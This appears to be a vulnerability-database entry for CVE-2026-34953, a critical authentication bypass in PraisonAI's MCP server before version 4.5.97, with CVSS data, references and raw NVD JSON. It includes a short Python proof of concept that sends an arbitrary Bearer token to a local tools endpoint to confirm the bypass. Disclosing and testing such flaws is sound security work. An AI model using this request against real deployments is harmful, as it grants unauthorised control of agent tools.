CVE-2026-34953

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validate_token() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities. This issue has been patched in version 4.5.97.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 4.5.97

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://localhost:8000/api/tools"

# Arbitrary Bearer token
headers = {
    "Authorization": "Bearer arbitrary_invalid_token",
    "Content-Type": "application/json"
}

try:
    # Send request to vulnerable endpoint
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability confirmed! Authentication bypassed.")
        print("[+] Response:", response.text)
    else:
        print("[-] Unexpected response code:", response.status_code)
except Exception as e:
    print("[-] Error:", e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34953
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34953
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34953/
[4] VulDB https://vuldb.com/cve/CVE-2026-34953
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5
[6] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34953", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:06.653", "lastModified": "2026-04-09T16:52:58.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validate_token() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities. This issue has been patched in version 4.5.97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.97", "matchCriteriaId": "7525B4ED-CECC-4805-8EED-C055561A15F0"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}